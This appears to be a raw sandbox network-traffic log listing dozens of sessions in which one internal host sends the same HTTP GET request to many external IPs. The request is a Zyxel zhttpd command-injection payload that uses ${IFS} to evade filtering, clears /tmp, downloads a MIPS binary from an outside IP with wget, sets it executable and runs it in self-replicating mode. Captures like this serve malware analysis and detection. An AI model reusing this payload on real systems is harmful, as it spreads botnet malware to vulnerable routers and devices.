                                            Jan 14, 2024 15:50:41.453501940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4962192.168.2.233828648.235.146.210443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.453524113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4963192.168.2.2351702191.121.252.105443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.453533888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4964192.168.2.2358046148.223.217.16443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.453577042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4965192.168.2.236050453.197.107.48443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.453610897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4966192.168.2.2358266168.127.251.0443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.453624010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4967192.168.2.234162867.63.61.4443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.453658104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4968192.168.2.2341466163.143.218.83443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.453707933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4969192.168.2.23521668.93.233.92443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.453723907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4970192.168.2.2334204114.217.96.212443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.453746080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4971192.168.2.2342694219.99.174.82443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.453789949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4972192.168.2.2341400190.66.66.110443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.453805923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4973192.168.2.2346156192.133.53.252443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.453821898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4974192.168.2.2335814104.144.96.194443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.453872919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4975192.168.2.234293286.148.255.161443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.453917027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4976192.168.2.235439479.168.59.223443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.453931093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4977192.168.2.2360538161.77.77.59443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.453962088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4978192.168.2.235605873.84.91.229443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.453984022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4979192.168.2.235578425.88.220.6443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.454025030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4980192.168.2.2343360154.232.218.102443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.454065084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4981192.168.2.2360286159.137.161.138443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.454091072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4982192.168.2.233393895.107.33.16443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.454129934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4983192.168.2.234369875.8.179.43443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.454133034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4984192.168.2.2348908115.220.46.139443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.454164028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4985192.168.2.2353110143.134.40.47443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.454232931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4986192.168.2.233811678.236.106.42443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.454243898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4987192.168.2.2334332206.200.80.168443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.454276085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4988192.168.2.2346226143.37.94.69443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.454281092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4989192.168.2.235756845.67.137.194443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.454303980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4990192.168.2.2345772110.143.179.19443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.454339981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4991192.168.2.233796087.151.255.248443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.454370022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4992192.168.2.23328285.248.130.209443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.454394102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4993192.168.2.2345432178.35.23.125443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.454397917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4994192.168.2.2356814209.212.138.79443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.454454899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4995192.168.2.234550664.226.217.52443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.454469919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4996192.168.2.2359940119.49.11.53443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.454507113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4997192.168.2.2358560201.150.114.215443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.454539061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4998192.168.2.234684242.21.52.102443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.454560041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4999192.168.2.2334554114.126.7.30443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.454606056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5000192.168.2.233361251.161.231.163443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.454632998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5001192.168.2.2351630133.128.121.187443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.454647064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5002192.168.2.2339800202.61.20.196443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.454694033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5003192.168.2.2358050108.145.101.128443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.454711914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5004192.168.2.2350086100.224.239.152443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.454737902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5005192.168.2.2342002201.110.154.185443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.454761028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5006192.168.2.2342098201.126.220.32443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.454796076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5007192.168.2.234896453.128.220.34443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.454828024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5008192.168.2.235586027.80.167.126443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.454869032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5009192.168.2.2356100165.126.195.245443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.454895973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5010192.168.2.2355564167.158.171.243443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.454921961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5011192.168.2.236056846.103.50.28443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.454957962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5012192.168.2.235897287.162.56.190443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.454992056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5013192.168.2.2358550195.240.137.79443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.455020905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5014192.168.2.234338687.64.98.175443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.455061913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5015192.168.2.2356100206.191.25.98443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.455096960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5016192.168.2.233343689.224.74.239443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.455116034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5017192.168.2.2339246187.153.170.167443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.455140114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5018192.168.2.23407305.156.191.29443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.455180883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5019192.168.2.2351446116.102.173.169443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.455198050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5020192.168.2.2346656141.148.81.237443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.455267906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5021192.168.2.234016223.218.216.50443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.455269098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5022192.168.2.2337352111.84.55.96443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.455271006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5023192.168.2.233553013.113.126.64443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.455315113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5024192.168.2.2360358138.61.40.37443
                                            TimestampBytes transferredDirectionData
